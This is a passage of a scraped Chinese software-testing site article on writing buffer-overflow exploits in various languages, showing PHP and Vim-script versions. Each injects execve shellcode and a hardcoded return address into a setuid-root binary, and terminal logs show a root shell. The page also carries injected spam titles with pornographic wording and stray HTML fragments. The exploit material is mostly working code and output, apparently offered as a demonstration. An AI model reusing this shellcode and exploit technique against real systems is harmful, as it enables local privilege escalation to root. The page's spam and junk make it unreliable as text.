• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  • 

    


    
  	
  	
    
  		
      
  			
    • 軟件測試技術
      • 
  			
    • 軟件測試博客
      • 
  			
    • 軟件測試視頻
      • 
  			
    • 開源軟件測試技術
      • 
  			
    • 軟件測試論壇
      • 
  			
    • 軟件測試沙龍
      • 
  			
    • 軟件測試資料下載
      • 
  			
    • 軟件測試雜志
      • 
  			
    • 軟件測試人才招聘
      • 
  		
    
  	
    

    
  
  
  
  
    
  	
    

    
    
    
    
    
  	
    
  	
    


      
暫時沒有公告

    

    

  	
    
  
    
  

    


    

    

    
  		
  		
  		
    
  			
    
          
字號:    |
推薦給好友
 上一篇 |
下一篇
        
    
        
    溢出利用程序和編程語言大雜燴
    
        
    
          發布: 2009-6-09 14:03 |
作者: 不詳 |
來源: 
測試時代采編 |
查看: 33次 | 進入軟件測試論壇討論
        
    
        
    
        領測軟件測試網

    <六> PHP版本

    [cloud@MagicLinux tmp]$ id
    uid=502(cloud) gid=502(cloud) groups=502(cloud)
    [cloud@MagicLinux tmp]$ ls -l vul
    -rwsr-xr-x  1 root root 4895  2月 26 20:57 vul
    [cloud@MagicLinux tmp]$ cat ex.php
    <?php
    $SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
    $AG="AA";
    for( $i=0;$i<10;$i++){
            $AG.=$AG;
    }
    $AG.=$AG.$AG; #3096

    for($i=0;$i<20;$i++) {
            $AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8
    }
    for($i=0;$i<4;$i++) {
      $AA.="A";
      print system("./vul ".$AA.$AD.$AG.$SH);
    }
    ?>
    [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
    id >&2
    uid=0(root) gid=502(cloud) groups=502(cloud)
    exit
    [cloud@MagicLinux tmp]$

    <七> Vim擴展腳本版本
    連vim編輯器的擴展編程腳本也可以拿來寫溢出的說:


    [cloud@MagicLinux tmp]$ id
    uid=502(cloud) gid=502(cloud) groups=502(cloud)
    [cloud@MagicLinux tmp]$ cat ex.vim
    let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"
    let AG="AA"
    let i=0
    while(i<10)
            let AG=AG.AG
            let i=i+1
    endwhile
    let AG=AG.AG.AG
    "len of AG is 3096

    let AD=""
    let i=0
    while(i<20)
            let AD=AD."\xff\xbf\xe8\xf3"
    "ADDR:0xbffff3e8
            let i=i+1
    endwhile

    let AA=""
    let i=0
    while(i<4)
      let AA=AA."A"
      execute "!./vul ". AA . AD . AG . SH
      let i=i+1
    endwhile
    [cloud@MagicLinux tmp]$ ls -l vul
    -rwsr-xr-x  1 root root 4895  2月 26 20:57 vul
    [cloud@MagicLinux tmp]$ vim -eS ex.vim
    Xlib: connection to ":0.0" refused by server
    Xlib: No protocol specified


    buff : A&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯&#65533;胯驛AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ……………………………………………………………………
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型&#65533;j
                                                                       X橰hn/shh//biT[RSTY蛝
    sh-2.05b# id
    uid=0(root) gid=502(cloud) groups=502(cloud)
    sh-2.05b#


    <八> ……




    <九> 小語

       溢出的根本在于地址定位、堆棧等數據結構的使用約定和組織、操作系統運行時結構等
    了解這些知識后溢出利用本生和編程語言是沒有關系的。
    
            
            
    
            
    
              
    
                  
    延伸閱讀
    
      
    
                      
    
  
    
    

    
    
    
    
    		
    




  
    

    

                  
    
                
    
            
    
            
    

    文章來源于領測軟件測試網 http://www.kjueaiud.com/
    











    


    

    44/4<1234
    
        
    
        
    軟件測試論壇
    
  		
    
  		
  		
    
  			
    
  				
    領測軟件測試網最新更新
      				
    
  					
  				
    
  			
    
  			
    
  				
    軟件測試技術相關文章
      				
    
  					
  				
    
  			
    
  		
    
  		
  		
    

  		

    
  		

    

    

    


    


    

    軟件測試培訓信息
    

    


    

    

    



    

    最新軟件測試技術專題
    

    

    

    



    

    最新領測軟件測試網新聞
    

    


    

    


    
    
    
    

    


    

    軟件測試技術文章排行榜
    

      

    • 編輯推薦
      • 

    • 周排行
      • 

    • 月排行
      • 

    




    



    

    軟件測試技術分類最新內容
    


    

    


    
       

    

    

    
 

    

	

    

    
關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    
版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    
北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備10010545號-5
    
技術支持和業務聯系:info@testage.com.cn 電話:010-51297073
    

    

    


    
軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    


    

    


 








 
        



老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

    • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  •